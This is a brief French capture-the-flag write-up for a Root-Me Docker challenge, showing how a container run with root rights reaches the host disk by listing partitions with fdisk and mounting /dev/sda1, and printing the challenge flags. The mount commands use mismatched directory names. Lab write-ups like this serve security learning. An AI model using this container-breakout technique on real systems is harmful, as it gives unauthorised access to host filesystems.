Aller au contenu

I am groot

Lien du CTF : https://www.root-me.org/fr/Challenges/App-Script/Docker-I-am-groot

https://www.root-me.org/?lang=fr&page=ctf_alltheday&id_salle=5

Analyse

Connexion ssh 

ssh root@ctf05.root-me.org -p 2222
List des dossier du home 

ls -lisha

Exploitation

Un docker lancé avec des droits root peut accèder à l'intégralité du disque hôte en seulement quelques commandes. On peut lister les disques :

fdisk -l

On s'aperçois qu'on voit bien le disque principale. Il ne reste plus qu'a le monter.

mkdir -p /tmp/hole
mount /dev/sda1 /tmp/hola

Analyse

Recherche de faille sur l'utilisation de docker en root

Flag CTF-AD : 5752814f962234bc98de6d99489c6995

Flag CTF-AD

Flag Challenge : b95d3d00d5336d16d7f27454ebe9cc58

Flag CTF-AD

Source

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#mounting-disk-poc1